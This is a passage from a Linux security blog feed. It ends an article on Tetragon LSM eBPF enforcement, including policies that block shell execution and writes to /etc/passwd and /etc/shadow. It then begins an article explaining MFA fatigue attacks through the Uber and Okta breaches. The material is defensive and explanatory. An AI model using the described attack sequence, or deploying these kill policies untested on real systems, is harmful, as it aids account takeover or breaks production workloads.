<li>Tetragon&#8217;s enforcement sends <code class="" data-line="">SIGKILL</code> from within the kernel context — not from a userspace agent reading an audit log and then killing the process</li>
<li>Production caution: LSM enforce mode without thorough policy testing in audit mode first will kill legitimate workloads; always audit before enforce</li>
</ul>
<hr />
<p>EP11 showed how to observe DNS queries at the kernel level — seeing what a workload resolves before it establishes a connection. But observation is passive. It tells you what happened. LSM eBPF Tetragon changes the question entirely: instead of watching the workload, the kernel refuses the operation. This episode covers how that enforcement layer works and why the difference between &#8220;detect&#8221; and &#8220;prevent&#8221; matters in runtime security.</p>
<h2 id="quick-check-is-your-cluster-running-lsm-based-enforcement">Quick Check: Is Your Cluster Running LSM-Based Enforcement?</h2>
<pre><code class="" data-line=""># On any cluster node — what security modules are active?
cat /sys/kernel/security/lsm

# Expected output on a modern kernel:
# lockdown,capability,landlock,yama,apparmor,bpf
#                                              ^^^
#                            &quot;bpf&quot; here means BPF LSM is enabled
</code></pre>
<pre><code class="" data-line=""># Is Tetragon running on this cluster?
kubectl get pods -n kube-system -l app.kubernetes.io/name=tetragon

# If Tetragon is present, check what TracingPolicies are enforcing:
kubectl get tracingpolicies -A

# Sample output:
# NAMESPACE    NAME                      AGE
# kube-system  block-privileged-exec     3d
# kube-system  restrict-sensitive-paths  3d
</code></pre>
<pre><code class="" data-line=""># See what eBPF programs Tetragon has loaded
bpftool prog list | grep -i tetragon

# Output sample:
# 89: lsm  name tetragon_lsm_bprm  tag 8f2a1c3e4d5b7a9f  gpl
#     loaded_at 2026-04-22T09:13:45+0530  uid 0
#     xlated 3312B  jited 2184B  memlock 8192B
# 91: kprobe  name tetragon_kp_exec tag 3c1d8e2f7a4b5c9d  gpl
</code></pre>
<p>The <code class="" data-line="">lsm</code> program type confirms LSM hook attachment. If you see <code class="" data-line="">tetragon_lsm_*</code> entries, Tetragon is enforcing at the kernel level on this node.</p>
<blockquote>
<p><strong>Not running Tetragon?</strong> Check if your cluster uses AppArmor or seccomp profiles instead — <code class="" data-line="">kubectl get pod &lt;name&gt; -o jsonpath=&#039;{.metadata.annotations}&#039;</code> and look for <code class="" data-line="">seccomp.security.alpha.kubernetes.io</code> or <code class="" data-line="">container.apparmor.security.beta.kubernetes.io</code> annotations. These are userspace-applied profiles that the kernel enforces. Tetragon is additive — it can run alongside AppArmor/seccomp and provides per-process, dynamic policy that static profiles cannot.</p>
</blockquote>
<hr />
<p>Falco fired at 03:14 AM. The alert: a process inside a production container had opened <code class="" data-line="">/etc/passwd</code> for writing. By the time I was on the call, the container had been restarted by a health check failure — the compromised process had already exited. The file had already been modified. Falco had detected the open, emitted the alert, and by the time any automated response could have acted, the syscall had returned, the write had completed, and the file was changed.</p>
<p>Falco did exactly what it&#8217;s designed to do: observe and alert. The gap isn&#8217;t in Falco — it&#8217;s in the architecture. When a tool detects from userspace by reading kernel audit events, there is always a window between the operation completing and the alert firing. For a fast exploit, that window is the entire attack.</p>
<p>I added a Tetragon TracingPolicy the following week:</p>
<pre><code class="" data-line="">spec:
  kprobes:
    - call: &quot;security_inode_permission&quot;
      syscall: false
      return: false
      args:
        - index: 0
          type: &quot;inode&quot;
      selectors:
        - matchArgs:
            - index: 0
              operator: &quot;Prefix&quot;
              values: [&quot;/etc/passwd&quot;, &quot;/etc/shadow&quot;]
          matchActions:
            - action: Sigkill
</code></pre>
<p>Next time a process tries to open <code class="" data-line="">/etc/passwd</code> for writing in a container covered by that policy, the kernel sends <code class="" data-line="">SIGKILL</code> from within the LSM hook. The open never completes. There is no window.</p>
<hr />
<h2 id="how-lsm-hooks-are-placed-in-the-kernel">How LSM Hooks Are Placed in the Kernel</h2>
<p>Linux Security Modules (LSM) is a framework built into the Linux kernel that inserts hook points before security-sensitive operations. The hook fires before the operation is allowed to complete — the LSM module can return an error code that causes the kernel to reject the operation and return <code class="" data-line="">-EPERM</code> to the calling process.</p>
<pre><code class="" data-line="">Process calls open(&quot;/etc/passwd&quot;, O_WRONLY)
      ↓
VFS (Virtual Filesystem) layer receives the request
      ↓
VFS calls security_inode_permission()   ← LSM hook fires here
      ↓
LSM module checks policy
      ↓
      ├── ALLOW → open() proceeds, file descriptor returned
      └── DENY  → open() returns -EPERM, process gets &quot;Operation not permitted&quot;
                  File is never touched
</code></pre>
<blockquote>
<p><strong><code class="" data-line="">LSM hook</code></strong> — a callback point embedded in Linux kernel source at every security-sensitive operation: file open, execute, socket connect, capability check, mount, ptrace, and more. The kernel calls registered LSM modules at each hook. Before BPF LSM (kernel 5.7), only statically compiled security modules (SELinux, AppArmor, Smack, TOMOYO) could register at these hooks.</p>
<p><strong><code class="" data-line="">BPF_PROG_TYPE_LSM</code></strong> — the eBPF program type that attaches to LSM hooks. Introduced in kernel 5.7. Requires BPF LSM to be enabled in the kernel (<code class="" data-line="">lsm=bpf</code> in kernel command line, or present alongside other LSMs). When this program type is loaded and attached to an LSM hook, the eBPF program runs at the hook point and returns 0 (allow) or a negative error code (deny).</p>
</blockquote>
<p>The full list of LSM hooks:</p>
<pre><code class="" data-line=""># All LSM hook points available for eBPF attachment
bpftool btf dump file /sys/kernel/btf/vmlinux | grep bpf_lsm_ | head -20

# Or browse the kernel source list:
# include/linux/security.h — every security_*() function is an LSM hook point
</code></pre>
<p>There are 200+ LSM hook points. The most operationally relevant for container security:</p>
<table>
<thead>
<tr>
<th>LSM Hook</th>
<th>What it guards</th>
</tr>
</thead>
<tbody>
<tr>
<td><code class="" data-line="">security_bprm_check</code></td>
<td>Process execution (execve)</td>
</tr>
<tr>
<td><code class="" data-line="">security_inode_permission</code></td>
<td>File read/write/execute</td>
</tr>
<tr>
<td><code class="" data-line="">security_inode_create</code></td>
<td>File creation</td>
</tr>
<tr>
<td><code class="" data-line="">security_socket_connect</code></td>
<td>Outbound TCP/UDP connect</td>
</tr>
<tr>
<td><code class="" data-line="">security_socket_bind</code></td>
<td>Port binding</td>
</tr>
<tr>
<td><code class="" data-line="">security_ptrace_access_check</code></td>
<td>ptrace (debugger attach)</td>
</tr>
<tr>
<td><code class="" data-line="">security_capable</code></td>
<td>Capability checks (CAP_SYS_ADMIN etc.)</td>
</tr>
</tbody>
</table>
<hr />
<h2 id="how-tetragon-combines-lsm-and-kprobe">How Tetragon Combines LSM and kprobe</h2>
<p>Tetragon attaches two types of programs simultaneously for comprehensive runtime security:</p>
<pre><code class="" data-line="">kprobe programs          LSM programs
(observation layer)      (enforcement layer)
       │                        │
       ↓                        ↓
Process executes              Kernel LSM hook fires
kernel function               BEFORE operation completes
       │                        │
       ↓                        ↓
Tetragon reads context:       Tetragon checks TracingPolicy:
  - process name                - selectors match?
  - PID, UID                    - action = Sigkill?
  - namespace, pod name         │
  - parent process              ↓
  - capabilities                SIGKILL sent from kernel context
       │                        Process terminated
       ↓                        Operation never completes
Tetragon exports event
  to userspace observer
</code></pre>
<p>The kprobe side provides the rich context (pod name, namespace, process tree) because it has access to Kubernetes metadata that Tetragon&#8217;s userspace component has pre-populated into maps. The LSM side provides the enforcement capability. Together, they give you context-aware kernel enforcement.</p>
<blockquote>
<p><strong><code class="" data-line="">SIGKILL</code> from kernel vs userspace kill</strong> — When a userspace process runs <code class="" data-line="">kill -9 &lt;pid&gt;</code>, it issues a kill syscall, the kernel schedules the signal delivery, and the target process dies on its next scheduler timeslice. There is a measurable delay — and more importantly, the target process may run for several more instructions before the signal is delivered. When a BPF LSM program returns a negative error code from within the hook, the kernel rejects the operation outright; when it calls <code class="" data-line="">bpf_send_signal(SIGKILL)</code>, the signal is raised from the kernel&#8217;s own execution context while the process is still inside the offending syscall. Either way, the decision is made before the process resumes in userspace. This is not a speed difference — it is a structural difference in when the enforcement happens relative to the operation.</p>
</blockquote>
<hr />
<h2 id="writing-a-tetragon-tracingpolicy-for-enforcement">Writing a Tetragon TracingPolicy for Enforcement</h2>
<p>Tetragon policies are Kubernetes custom resources. Here&#8217;s a policy that prevents any container from executing shells:</p>
<pre><code class="" data-line="">apiVersion: cilium.io/v1alpha1
kind: TracingPolicy
metadata:
  name: block-shell-exec
spec:
  kprobes:
    - call: &quot;security_bprm_check&quot;
      syscall: false
      args:
        - index: 0
          type: &quot;linux_binprm&quot;
      selectors:
        - matchBinaries:
            - operator: &quot;In&quot;
              values:
                - &quot;/bin/sh&quot;
                - &quot;/bin/bash&quot;
                - &quot;/bin/dash&quot;
                - &quot;/usr/bin/sh&quot;
                - &quot;/usr/bin/bash&quot;
          matchNamespaces:
            - namespace: Pid
              operator: &quot;NotIn&quot;
              values: [&quot;1&quot;]      # exclude host namespace (PID 1 = init)
          matchActions:
            - action: Sigkill
              argError: -1       # EPERM returned to the caller
</code></pre>
<p>Apply and verify:</p>
<pre><code class="" data-line="">kubectl apply -f block-shell-exec.yaml

# Confirm it&#039;s active
kubectl get tracingpolicies
# NAME               ENABLED   REASON   AGE
# block-shell-exec   true               5s

# Verify Tetragon loaded the eBPF program for this policy
bpftool prog list | grep bprm
# 94: lsm  name tetragon_lsm_bprm  tag 8f2a1c3e4d5b7a9f  gpl
#     loaded_at 2026-04-22T14:22:13+0530  uid 0
</code></pre>
<p>Test it (in a non-production namespace):</p>
<pre><code class="" data-line="">kubectl exec -it test-pod -- /bin/sh

# Expected output:
# OCI runtime exec failed: exec failed: unable to start container process:
# error during container init: error starting executable [&quot;/bin/sh&quot;]:
# container_linux.go: ... starting container process caused: process_linux.go:
# ... SIGKILL
</code></pre>
<p>The shell never started. The <code class="" data-line="">security_bprm_check</code> LSM hook fired, and the Tetragon eBPF program evaluated the policy and sent <code class="" data-line="">SIGKILL</code> from kernel space. The exec system call returned <code class="" data-line="">-EPERM</code> to the container runtime. No shell process was created.</p>
<hr />
<h2 id="audit-mode-before-enforce-mode">Audit Mode Before Enforce Mode</h2>
<p>Running a new LSM policy in enforce mode without prior testing will kill legitimate workloads. Tetragon supports audit mode for every policy:</p>
<pre><code class="" data-line="">          matchActions:
            - action: Post     # audit mode: log event, do NOT kill
</code></pre>
<p><code class="" data-line="">Post</code> emits a Tetragon event that you can observe:</p>
<pre><code class="" data-line=""># Watch audit events for the policy (before switching to Sigkill)
kubectl exec -n kube-system -it \
  $(kubectl get pod -n kube-system -l app.kubernetes.io/name=tetragon -o name | head -1) \
  -- tetra getevents --event-types PROCESS_KPROBE | grep bprm
</code></pre>
<p>Sample audit event:</p>
<pre><code class="" data-line="">{
  &quot;process_kprobe&quot;: {
    &quot;process&quot;: {
      &quot;pod&quot;: {&quot;name&quot;: &quot;my-app-6d4f9-xk2p1&quot;, &quot;namespace&quot;: &quot;production&quot;},
      &quot;binary&quot;: &quot;/bin/sh&quot;,
      &quot;pid&quot;: 18293
    },
    &quot;function_name&quot;: &quot;security_bprm_check&quot;,
    &quot;action&quot;: &quot;KPROBE_ACTION_POST&quot;
  }
}
</code></pre>
<p>If <code class="" data-line="">my-app</code> legitimately needs <code class="" data-line="">/bin/sh</code> for its health check script, you&#8217;ll see it here before you kill it. Refine the selector (add <code class="" data-line="">matchLabels</code> to exclude that specific deployment, or add the binary to an allowlist) and then switch to <code class="" data-line="">Sigkill</code>.</p>
<hr />
<h2 id="production-gotchas"><img src="https://s.w.org/images/core/emoji/17.0.2/72x72/26a0.png" alt="⚠" class="wp-smiley" style="height: 1em; max-height: 1em;" /> Production Gotchas</h2>
<p><strong>Enforce mode kills anything the selector matches — including health checks and init containers.</strong> Most production containers have some shell usage: liveness probes that run <code class="" data-line="">sh -c</code>, init containers that <code class="" data-line="">chmod</code> files, entrypoint wrappers. Run in <code class="" data-line="">Post</code> (audit) mode for at least 48 hours across a representative workload set before switching to <code class="" data-line="">Sigkill</code>. Track all matched events and understand every process in the trace before enforcing.</p>
<p><strong>LSM hooks fire in kernel context — eBPF program complexity is limited.</strong> The verifier enforces strict limits on LSM programs because they run synchronously in the kernel&#8217;s hot path. Policies with many conditions or complex map lookups may be rejected by the verifier. Tetragon&#8217;s policy engine compiles your TracingPolicy into eBPF that stays within verifier limits, but very complex <code class="" data-line="">matchArgs</code> chains with many values can hit limits. Test with <code class="" data-line="">kubectl apply</code> and check Tetragon pod logs for verifier rejection messages.</p>
<p><strong><code class="" data-line="">BPF_PROG_TYPE_LSM</code> requires kernel 5.7+ and BPF LSM enabled.</strong> Check <code class="" data-line="">/sys/kernel/security/lsm</code> for <code class="" data-line="">bpf</code> in the list. EKS nodes running Amazon Linux 2 with kernel 5.10+ have BPF LSM available. GKE nodes with kernel 5.10+ on Container-Optimized OS have it enabled. Ubuntu 22.04 (kernel 5.15) has it enabled by default. Ubuntu 20.04 kernels before 5.7 do not — check your actual kernel version.</p>
<p><strong>Policy scope: Tetragon TracingPolicies are cluster-wide by default.</strong> A policy without a <code class="" data-line="">matchNamespaces</code> or <code class="" data-line="">matchLabels</code> selector applies to every pod on every node. Start with namespace-scoped policies during testing. Use <code class="" data-line="">TracingPolicyNamespaced</code> resources (Tetragon 0.10+) to limit scope to a specific namespace.</p>
<p><strong><code class="" data-line="">bpf_send_signal(SIGKILL)</code> vs returning an error code.</strong> Tetragon&#8217;s <code class="" data-line="">Sigkill</code> action uses <code class="" data-line="">bpf_send_signal()</code> rather than returning a negative error from the LSM hook. This means the syscall may return before the signal is delivered — there can be a single instruction window. For critical enforcement paths, combining LSM deny (return <code class="" data-line="">-EPERM</code>) with <code class="" data-line="">bpf_send_signal(SIGKILL)</code> is the belt-and-suspenders approach; Tetragon&#8217;s maintainers have documented which actions use which mechanism.</p>
<hr />
<h2 id="quick-reference">Quick Reference</h2>
<table>
<thead>
<tr>
<th>What you want</th>
<th>Command</th>
</tr>
</thead>
<tbody>
<tr>
<td>Is BPF LSM enabled?</td>
<td><code class="" data-line="">cat /sys/kernel/security/lsm</code> (look for <code class="" data-line="">bpf</code>)</td>
</tr>
<tr>
<td>What LSM programs are loaded?</td>
<td><code class="" data-line="">bpftool prog list | grep lsm</code></td>
</tr>
<tr>
<td>What Tetragon policies exist?</td>
<td><code class="" data-line="">kubectl get tracingpolicies -A</code></td>
</tr>
<tr>
<td>Audit events (before enforce)</td>
<td><code class="" data-line="">tetra getevents --event-types PROCESS_KPROBE</code></td>
</tr>
<tr>
<td>Watch Tetragon enforcement</td>
<td><code class="" data-line="">kubectl logs -n kube-system -l app.kubernetes.io/name=tetragon -f</code></td>
</tr>
<tr>
<td>Test a policy safely</td>
<td>Set <code class="" data-line="">action: Post</code> before <code class="" data-line="">action: Sigkill</code></td>
</tr>
</tbody>
</table>
<table>
<thead>
<tr>
<th>Tetragon action</th>
<th>Effect</th>
</tr>
</thead>
<tbody>
<tr>
<td><code class="" data-line="">Post</code></td>
<td>Log event only — audit mode</td>
</tr>
<tr>
<td><code class="" data-line="">Sigkill</code></td>
<td>Send SIGKILL from kernel context</td>
</tr>
<tr>
<td><code class="" data-line="">Override</code></td>
<td>Return custom error code to syscall caller</td>
</tr>
<tr>
<td><code class="" data-line="">FollowFD</code></td>
<td>Track file descriptor for future hook correlation</td>
</tr>
</tbody>
</table>
<table>
<thead>
<tr>
<th>LSM hook</th>
<th>Protects</th>
</tr>
</thead>
<tbody>
<tr>
<td><code class="" data-line="">security_bprm_check</code></td>
<td>exec (block shell spawning)</td>
</tr>
<tr>
<td><code class="" data-line="">security_inode_permission</code></td>
<td>file access (block reads/writes to sensitive paths)</td>
</tr>
<tr>
<td><code class="" data-line="">security_socket_connect</code></td>
<td>outbound connections (block C2 connections)</td>
</tr>
<tr>
<td><code class="" data-line="">security_capable</code></td>
<td>capability escalation (block CAP_SYS_ADMIN attempts)</td>
</tr>
</tbody>
</table>
<hr />
<h2 id="key-takeaways">Key Takeaways</h2>
<ul>
<li>LSM eBPF Tetragon enforces at the syscall boundary — the operation either never completes or returns an error before the kernel performs the action, with no detect-and-respond window</li>
<li>Falco, Datadog, and sidecar-based tools detect events after the syscall returns; this is architectural, not a product limitation — they operate at a layer where the operation has already occurred</li>
<li><code class="" data-line="">BPF_PROG_TYPE_LSM</code> attaches eBPF programs directly to Linux Security Module hooks; available on kernel 5.7+, enabled on all current EKS/GKE LTS node images</li>
<li>Tetragon sends <code class="" data-line="">SIGKILL</code> from kernel context using <code class="" data-line="">bpf_send_signal()</code> — not from a userspace agent polling an audit log</li>
<li>Always run Tetragon policies in <code class="" data-line="">Post</code> (audit) mode for 48+ hours before switching to <code class="" data-line="">Sigkill</code> — legitimate workloads trigger many of the same LSM hooks that attacks use</li>
<li>The combination of kprobe (rich context: pod name, namespace, process tree) and LSM (enforcement) gives Tetragon context-aware kernel enforcement that static profiles (AppArmor, seccomp) cannot provide dynamically</li>
</ul>
<hr />
<h2 id="whats-next">What&#8217;s Next</h2>
<p>LSM hooks prevent operations in the moment. But after an incident — when enforcement failed, or when you&#8217;re doing post-hoc forensics — the question changes: what did this process spawn, what files did it touch, what connections did it make, and in what order? Answering that from logs alone is guesswork. Answering it from kernel-level process lineage is reconstruction.</p>
<p>EP13 covers how eBPF kprobe hooks on <code class="" data-line="">fork</code> and <code class="" data-line="">exec</code> build a complete, tamper-resistant process tree. Even after the attacker&#8217;s process has exited, the record remains — in kernel maps, exported to a persistent store, tied to the pod that ran it.</p>
<p><em>Next: <a href="/process-lineage-ebpf/">process lineage with eBPF — reconstructing what happened after the fact</a></em></p>
<p>Get EP13 in your inbox when it publishes → <a href="https://linuxcent.com/subscribe">linuxcent.com/subscribe</a></p>
<p><a class="a2a_button_mastodon" href="https://www.addtoany.com/add_to/mastodon?linkurl=https%3A%2F%2Flinuxcent.com%2Febpf-lsm-tetragon-runtime-security%2F&amp;linkname=LSM%20and%20Tetragon%20%E2%80%94%20When%20the%20Kernel%20Says%20No" title="Mastodon" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Flinuxcent.com%2Febpf-lsm-tetragon-runtime-security%2F&amp;linkname=LSM%20and%20Tetragon%20%E2%80%94%20When%20the%20Kernel%20Says%20No" title="Email" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_whatsapp" href="https://www.addtoany.com/add_to/whatsapp?linkurl=https%3A%2F%2Flinuxcent.com%2Febpf-lsm-tetragon-runtime-security%2F&amp;linkname=LSM%20and%20Tetragon%20%E2%80%94%20When%20the%20Kernel%20Says%20No" title="WhatsApp" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Flinuxcent.com%2Febpf-lsm-tetragon-runtime-security%2F&amp;linkname=LSM%20and%20Tetragon%20%E2%80%94%20When%20the%20Kernel%20Says%20No" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_x" href="https://www.addtoany.com/add_to/x?linkurl=https%3A%2F%2Flinuxcent.com%2Febpf-lsm-tetragon-runtime-security%2F&amp;linkname=LSM%20and%20Tetragon%20%E2%80%94%20When%20the%20Kernel%20Says%20No" title="X" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Flinuxcent.com%2Febpf-lsm-tetragon-runtime-security%2F&amp;linkname=LSM%20and%20Tetragon%20%E2%80%94%20When%20the%20Kernel%20Says%20No" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_copy_link" href="https://www.addtoany.com/add_to/copy_link?linkurl=https%3A%2F%2Flinuxcent.com%2Febpf-lsm-tetragon-runtime-security%2F&amp;linkname=LSM%20and%20Tetragon%20%E2%80%94%20When%20the%20Kernel%20Says%20No" title="Copy Link" 
rel="nofollow noopener" target="_blank"></a><a class="a2a_dd addtoany_share_save addtoany_share" href="https://www.addtoany.com/share#url=https%3A%2F%2Flinuxcent.com%2Febpf-lsm-tetragon-runtime-security%2F&#038;title=LSM%20and%20Tetragon%20%E2%80%94%20When%20the%20Kernel%20Says%20No" data-a2a-url="https://linuxcent.com/ebpf-lsm-tetragon-runtime-security/" data-a2a-title="LSM and Tetragon — When the Kernel Says No"></a></p><p>The post <a href="https://linuxcent.com/ebpf-lsm-tetragon-runtime-security/">LSM and Tetragon — When the Kernel Says No</a> appeared first on <a href="https://linuxcent.com">Linuxcent</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://linuxcent.com/ebpf-lsm-tetragon-runtime-security/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">1841</post-id>	</item>
		<item>
		<title>MFA Fatigue Attacks: How Uber Got Breached and How to Stop It</title>
		<link>https://linuxcent.com/mfa-fatigue-attack-uber-okta/</link>
					<comments>https://linuxcent.com/mfa-fatigue-attack-uber-okta/#respond</comments>
		
		<dc:creator><![CDATA[Vamshi Krishna Santhapuri]]></dc:creator>
		<pubDate>Wed, 10 Jun 2026 02:00:00 +0000</pubDate>
				<category><![CDATA[Purple Team]]></category>
		<category><![CDATA[Identity Security]]></category>
		<category><![CDATA[MFA]]></category>
		<category><![CDATA[MFA Fatigue]]></category>
		<category><![CDATA[Okta]]></category>
		<category><![CDATA[OWASP]]></category>
		<category><![CDATA[Uber Breach]]></category>
		<guid isPermaLink="false">https://linuxcent.com/?p=1855</guid>

					<description><![CDATA[<p><span class="span-reading-time rt-reading-time" style="display: block;"><span class="rt-label rt-prefix">Reading Time: </span> <span class="rt-time"> 10</span> <span class="rt-label rt-postfix">minutes</span></span>MFA fatigue attacks exploit push-based MFA UX — not weak passwords. Anatomy of the Uber and Okta breaches and why hardware keys are the only structural fix.</p>
<p>The post <a href="https://linuxcent.com/mfa-fatigue-attack-uber-okta/">MFA Fatigue Attacks: How Uber Got Breached and How to Stop It</a> appeared first on <a href="https://linuxcent.com">Linuxcent</a>.</p>
]]></description>
										<content:encoded><![CDATA[<span class="span-reading-time rt-reading-time" style="display: block;"><span class="rt-label rt-prefix">Reading Time: </span> <span class="rt-time"> 10</span> <span class="rt-label rt-postfix">minutes</span></span><style>
/* Code blocks: dark panel; position:relative anchors the absolutely positioned copy button and language badge. */
pre{position:relative;background:#1e1e1e;color:#d4d4d4;
    padding:16px 16px 16px 20px;border-radius:6px;overflow-x:auto;
    font-family:'JetBrains Mono','Fira Code','Cascadia Code',Consolas,'Courier New',monospace;
    font-size:.88em;line-height:1.6;border-left:4px solid #555}
/* Inline code gets a light chip; code inside pre inherits the dark panel instead. */
code{background:#f4f4f4;padding:2px 5px;border-radius:3px;font-size:.9em}
pre code{background:transparent;padding:0;color:inherit}
/* Left accent colour keyed on the data-lang attribute of the pre element. */
pre[data-lang="bash"],pre[data-lang="sh"],
pre[data-lang="shell"],pre[data-lang="zsh"]{border-left-color:#4ec9b0}
pre[data-lang="yaml"],pre[data-lang="json"],
pre[data-lang="toml"],pre[data-lang="xml"]{border-left-color:#569cd6}
pre[data-lang="python"],pre[data-lang="go"],pre[data-lang="rust"],
pre[data-lang="java"],pre[data-lang="c"],pre[data-lang="cpp"]{border-left-color:#c586c0}
pre[data-lang="text"],pre[data-lang="output"],
pre[data-lang="console"]{border-left-color:#888}
/* Copy button: transparent until the block is hovered. */
.lc-copy-btn{position:absolute;top:8px;right:8px;background:#2d2d2d;color:#ccc;
    border:1px solid #444;border-radius:4px;padding:3px 9px;font-size:.75em;
    font-family:system-ui,sans-serif;cursor:pointer;opacity:0;
    transition:opacity .15s,background .15s;line-height:1.6}
pre:hover .lc-copy-btn{opacity:1}
/* Also reveal the button on keyboard focus; otherwise tabbing lands on an invisible control. */
.lc-copy-btn:focus-visible{opacity:1}
.lc-copy-btn:hover{background:#3a3a3a;color:#fff}
.lc-copy-btn.copied{color:#4ec9b0;border-color:#4ec9b0}
/* Language badge: decorative label shown on hover; pointer-events:none keeps it from intercepting clicks. */
.lc-lang-badge{position:absolute;top:8px;left:20px;font-family:system-ui,sans-serif;
    font-size:.7em;color:#666;text-transform:uppercase;letter-spacing:.04em;
    line-height:1;pointer-events:none;opacity:0;transition:opacity .15s}
pre:hover .lc-lang-badge{opacity:1}
/* Article tables: collapsed borders with zebra-striped rows. */
table{border-collapse:collapse;width:100%;margin:16px 0}
th,td{border:1px solid #ddd;padding:10px 14px;text-align:left}
th{background:#f0f0f0;font-weight:600}
tr:nth-child(even){background:#fafafa}
</style>
<p><script>
(function(){
  // Code-block enhancer: gives every pre element a "Copy" button and, when its
  // code child carries a language-* class, a data-lang attribute plus a badge.
  // The window-level flag keeps the script idempotent when the same snippet is
  // embedded more than once on a page.
  if(window.__lcCodeEnhanced)return;
  window.__lcCodeEnhanced=true;
  // Decorate every pre element currently in the document.
  function enhance(){
    document.querySelectorAll('pre').forEach(function(pre){
      var code=pre.querySelector('code');
      var lang='';
      if(code){var m=(code.className||'').match(/language-(\S+)/);if(m)lang=m[1].toLowerCase();}
      if(lang){
        pre.setAttribute('data-lang',lang);
        var badge=document.createElement('span');badge.className='lc-lang-badge';badge.textContent=lang;
        pre.insertBefore(badge,pre.firstChild);
      }
      var btn=document.createElement('button');
      btn.type='button'; // never behave as a submit button if the pre sits inside a form
      btn.className='lc-copy-btn';btn.textContent='Copy';btn.setAttribute('aria-label','Copy code to clipboard');
      pre.appendChild(btn);
      btn.addEventListener('click',function(){
        // Without a code child the text comes from the pre itself, which also
        // contains the injected button; exclude the button's own label.
        var text=code?code.innerText:textWithout(pre,btn);
        if(navigator.clipboard&&window.isSecureContext){
          navigator.clipboard.writeText(text).then(function(){ok(btn);}).catch(function(){fb(text,btn);});
        }else{fb(text,btn);}
      });
    });
  }
  // Returns host.innerText with el temporarily un-rendered so that el's text is
  // left out; the previous inline display value is always restored.
  function textWithout(host,el){
    var prev=el.style.display;
    el.style.display='none';
    try{return host.innerText;}
    finally{el.style.display=prev;}
  }
  // Success feedback: show "Copied!" for two seconds, then reset the label.
  function ok(btn){btn.textContent='Copied!';btn.classList.add('copied');setTimeout(function(){btn.textContent='Copy';btn.classList.remove('copied');},2000);}
  // Failure feedback: show the failure label for two seconds, then reset it.
  function fail(btn){btn.textContent='✗ Failed';setTimeout(function(){btn.textContent='Copy';},2000);}
  // Fallback copy path for insecure contexts or a rejected Clipboard API call:
  // select the text in an off-screen textarea and run execCommand('copy').
  function fb(text,btn){
    var ta=document.createElement('textarea');
    var copied=false;
    try{
      ta.value=text;
      ta.style.cssText='position:fixed;left:-9999px;top:-9999px;opacity:0';
      document.body.appendChild(ta);
      ta.select();
      // execCommand reports failure by returning false, not by throwing.
      copied=document.execCommand('copy');
    }catch(e){
      copied=false;
    }finally{
      // Remove the helper textarea on every path so it cannot leak into the page.
      if(ta.parentNode)ta.parentNode.removeChild(ta);
    }
    if(copied){ok(btn);}else{fail(btn);}
  }
  if(document.readyState==='loading'){document.addEventListener('DOMContentLoaded',enhance);}else{enhance();}
})();
</script></p>
<p><a href="/what-is-purple-team-security/">What is purple team security</a> → <a href="/owasp-top-10-cloud-infrastructure/">OWASP Top 10 mapped to cloud infrastructure</a> → <a href="/cloud-security-breaches-2020-2025/">Cloud security breaches 2020–2025</a> → <a href="/broken-access-control-aws/">Broken access control in AWS</a> → <strong>MFA fatigue attacks</strong></p>
<hr />
<h2 id="tldr">TL;DR</h2>
<ul>
<li>An <strong>MFA fatigue attack</strong> exploits push-notification MFA (Duo, Okta Verify, Microsoft Authenticator) by flooding a user with push requests until they accept one — either out of exhaustion or after social engineering</li>
<li>Uber (September 2022): contractor credentials purchased on a criminal marketplace → repeated Duo push notifications → WhatsApp social engineering → push accepted → admin PAM credentials found on internal file share → full access to AWS, GCP, Slack, HackerOne</li>
<li>The attack works because push MFA creates a UX habit: &#8220;tap accept&#8221; is a trained response, not a decision</li>
<li>Detection: multiple MFA failures followed by a single success in a short window — Okta System Log, Azure AD Sign-in Log, AWS CloudTrail</li>
<li>The structural fix is replacing push MFA with phishing-resistant FIDO2 hardware keys — not security awareness training, not more push notifications, not &#8220;number matching&#8221; alone</li>
<li>Okta (October 2023): support system breach exposed session tokens → attackers bypassed MFA entirely by using stolen session context</li>
</ul>
<hr />
<blockquote>
<p><strong>OWASP Mapping:</strong> A07 Identification and Authentication Failures. The Uber breach is the defining infrastructure example. Okta demonstrates session token theft as a related A07 variant.</p>
</blockquote>
<hr />
<h2 id="the-big-picture">The Big Picture</h2>
<pre><code class="" data-line="">┌─────────────────────────────────────────────────────────────────────┐
│                    MFA FATIGUE ATTACK ANATOMY                       │
│                                                                     │
│   STEP 1: OBTAIN CREDENTIALS                                        │
│   Attacker ──── phish / buy on market ──────&#x25b6; username + password  │
│                                                                     │
│   STEP 2: TRIGGER MFA FLOOD                                         │
│   Attacker ──── repeated login attempts ────&#x25b6; Push #1 → User: NO   │
│                                               Push #2 → User: NO   │
│                                               Push #3 → User: NO   │
│                                               Push #4 → User: ???   │
│                                                                     │
│   STEP 3: SOCIAL ENGINEERING LAYER                                  │
│   Attacker ──── &quot;Hi, I&#039;m from IT support.                           │
│                  Please accept the next push.&quot;                      │
│                                               Push #4 → User: YES  │
│                                                                     │
│   STEP 4: ACCESS                                                    │
│   Attacker ──── authenticated session ──────&#x25b6; Internal network      │
│                                               Enumerate shares      │
│                                               Find next credential  │
│                                                                     │
│   ═══════════════════════════════════════════════════════           │
│   WHY TRAINING DOESN&#039;T HELP:                                        │
│   Push MFA trains users to tap accept. The attacker exploits        │
│   the trained behavior. Education competes with habit.              │
│                                                                     │
│   WHY HARDWARE KEYS DO:                                             │
│   FIDO2 requires physical presence. WhatsApp message                │
│   cannot accept a hardware key challenge.                           │
└─────────────────────────────────────────────────────────────────────┘
</code></pre>
<p>An <strong>MFA fatigue attack</strong> is how you bypass multi-factor authentication without breaking encryption or stealing the MFA seed — you exploit the user&#8217;s psychology and the UX of push-notification systems. The attacker knows the password. The only thing standing between them and access is the user&#8217;s willingness to tap &#8220;deny&#8221; indefinitely.</p>
<hr />
